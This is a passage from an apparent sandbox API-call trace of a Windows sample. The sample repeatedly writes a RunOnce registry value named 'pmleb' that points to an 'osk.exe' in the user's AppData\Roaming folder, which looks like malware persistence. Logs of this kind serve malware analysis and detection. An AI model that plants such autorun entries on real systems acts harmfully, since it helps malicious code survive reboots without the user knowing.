wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.074] KillTimer (hWnd=0x20280, uIDEvent=0x22cb) returned 1 [0098.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.075] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.075] RegCloseKey (hKey=0x280) returned 0x0 [0098.076] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.076] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.076] SetTimer (hWnd=0x20280, nIDEvent=0x22cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cc [0098.076] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.083] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.083] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.083] KillTimer (hWnd=0x20280, uIDEvent=0x22cc) returned 1 [0098.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.083] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.084] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.084] RegCloseKey (hKey=0x280) returned 0x0 [0098.084] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.084] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.084] SetTimer (hWnd=0x20280, nIDEvent=0x22cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cd [0098.084] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.098] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.098] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.098] KillTimer (hWnd=0x20280, uIDEvent=0x22cd) returned 1 [0098.099] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.099] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.099] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.099] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.099] RegCloseKey (hKey=0x280) returned 0x0 [0098.100] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.100] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.100] SetTimer (hWnd=0x20280, nIDEvent=0x22ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x22ce [0098.100] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.114] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.114] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.114] KillTimer (hWnd=0x20280, uIDEvent=0x22ce) returned 1 [0098.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.115] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.115] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.115] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.115] RegCloseKey (hKey=0x280) returned 0x0 [0098.116] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.116] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.116] SetTimer (hWnd=0x20280, nIDEvent=0x22cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x22cf [0098.116] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.130] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.130] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.130] KillTimer (hWnd=0x20280, uIDEvent=0x22cf) returned 1 [0098.130] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.131] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.131] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.131] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.131] RegCloseKey (hKey=0x280) returned 0x0 [0098.131] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.131] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.132] SetTimer (hWnd=0x20280, nIDEvent=0x22d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d0 [0098.132] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.145] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.145] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.145] KillTimer (hWnd=0x20280, uIDEvent=0x22d0) returned 1 [0098.146] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.146] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.146] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.146] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.147] RegCloseKey (hKey=0x280) returned 0x0 [0098.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.147] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.147] SetTimer (hWnd=0x20280, nIDEvent=0x22d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d1 [0098.147] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.161] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.161] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.161] KillTimer (hWnd=0x20280, uIDEvent=0x22d1) returned 1 [0098.161] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.162] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.162] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.162] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.162] RegCloseKey (hKey=0x280) returned 0x0 [0098.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.162] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.163] SetTimer (hWnd=0x20280, nIDEvent=0x22d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d2 [0098.163] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.176] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.176] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.176] KillTimer (hWnd=0x20280, uIDEvent=0x22d2) returned 1 [0098.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.177] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.177] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.177] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.177] RegCloseKey (hKey=0x280) returned 0x0 [0098.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.178] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.178] SetTimer (hWnd=0x20280, nIDEvent=0x22d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d3 [0098.178] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.192] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.192] KillTimer (hWnd=0x20280, uIDEvent=0x22d3) returned 1 [0098.193] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.193] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.193] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.193] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.194] RegCloseKey (hKey=0x280) returned 0x0 [0098.194] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.194] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.194] SetTimer (hWnd=0x20280, nIDEvent=0x22d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d4 [0098.194] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.207] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.207] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.208] KillTimer (hWnd=0x20280, uIDEvent=0x22d4) returned 1 [0098.208] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.208] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.208] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.209] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.209] RegCloseKey (hKey=0x280) returned 0x0 [0098.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.209] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.209] SetTimer (hWnd=0x20280, nIDEvent=0x22d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d5 [0098.209] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.223] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.223] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.224] KillTimer (hWnd=0x20280, uIDEvent=0x22d5) returned 1 [0098.224] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.224] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.224] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.225] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.225] RegCloseKey (hKey=0x280) returned 0x0 [0098.225] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.225] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.225] SetTimer (hWnd=0x20280, nIDEvent=0x22d6, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d6 [0098.225] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.286] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.286] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.286] KillTimer (hWnd=0x20280, uIDEvent=0x22d6) returned 1 [0098.286] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.287] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.287] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.287] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.287] RegCloseKey (hKey=0x280) returned 0x0 [0098.288] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.288] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.288] SetTimer (hWnd=0x20280, nIDEvent=0x22d7, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d7 [0098.288] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.301] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.301] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.301] KillTimer (hWnd=0x20280, uIDEvent=0x22d7) returned 1 [0098.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.302] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.302] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.303] RegCloseKey (hKey=0x280) returned 0x0 [0098.303] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.303] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.303] SetTimer (hWnd=0x20280, nIDEvent=0x22d8, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d8 [0098.303] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.317] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.317] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.317] KillTimer (hWnd=0x20280, uIDEvent=0x22d8) returned 1 [0098.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.318] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.318] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.318] RegCloseKey (hKey=0x280) returned 0x0 [0098.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.318] SetTimer (hWnd=0x20280, nIDEvent=0x22d9, uElapse=0xa, lpTimerFunc=0x0) returned 0x22d9 [0098.319] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.332] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.332] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.333] KillTimer (hWnd=0x20280, uIDEvent=0x22d9) returned 1 [0098.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.334] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.334] RegCloseKey (hKey=0x280) returned 0x0 [0098.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.334] SetTimer (hWnd=0x20280, nIDEvent=0x22da, uElapse=0xa, lpTimerFunc=0x0) returned 0x22da [0098.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.348] KillTimer (hWnd=0x20280, uIDEvent=0x22da) returned 1 [0098.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.349] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.349] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.350] RegCloseKey (hKey=0x280) returned 0x0 [0098.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.350] SetTimer (hWnd=0x20280, nIDEvent=0x22db, uElapse=0xa, lpTimerFunc=0x0) returned 0x22db [0098.350] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.364] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.364] KillTimer (hWnd=0x20280, uIDEvent=0x22db) returned 1 [0098.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.365] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.365] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.365] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.365] RegCloseKey (hKey=0x280) returned 0x0 [0098.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.366] SetTimer (hWnd=0x20280, nIDEvent=0x22dc, uElapse=0xa, lpTimerFunc=0x0) returned 0x22dc [0098.366] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.379] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.379] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.379] KillTimer (hWnd=0x20280, uIDEvent=0x22dc) returned 1 [0098.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.381] RegCloseKey (hKey=0x280) returned 0x0 [0098.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.381] SetTimer (hWnd=0x20280, nIDEvent=0x22dd, uElapse=0xa, lpTimerFunc=0x0) returned 0x22dd [0098.381] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.395] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.395] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.395] KillTimer (hWnd=0x20280, uIDEvent=0x22dd) returned 1 [0098.395] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.395] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.396] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 